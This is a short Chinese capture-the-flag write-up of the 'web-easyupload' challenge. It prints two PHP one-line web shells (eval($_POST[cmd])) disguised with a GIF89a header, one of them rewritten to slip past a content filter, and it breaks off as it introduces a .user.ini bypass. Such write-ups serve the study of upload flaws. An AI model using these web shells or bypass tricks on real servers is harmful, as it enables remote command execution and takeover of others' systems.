攻防世界(CTF)~web-easyupload

这题很明显是一题文件上传的题目

直接先上传一个带一句话木马的文件后缀名为.jpg,然后brupsuit抓包看一下，GIF89a是文件头欺骗，小白我做文件上传是习惯性带上，有利无害

GIF89a
<?php
eval($_POST[cmd]);
?>

上传失败，这里我把木马删除发了一次包是成功的，说明不是文件后缀的问题，木马被过滤了

改一下木马试了一下，成功上传

GIF89a
<?=eval($_POST[cmd]);

访问看一下，虽然上传成功了，但这样很明显无法getshell，没有被解析

这里小白我尝试了很多绕过，但是都无法成功，这个时候想到了一个知识点".user.ini"绕过

那么什么是.user.ini绕过呢？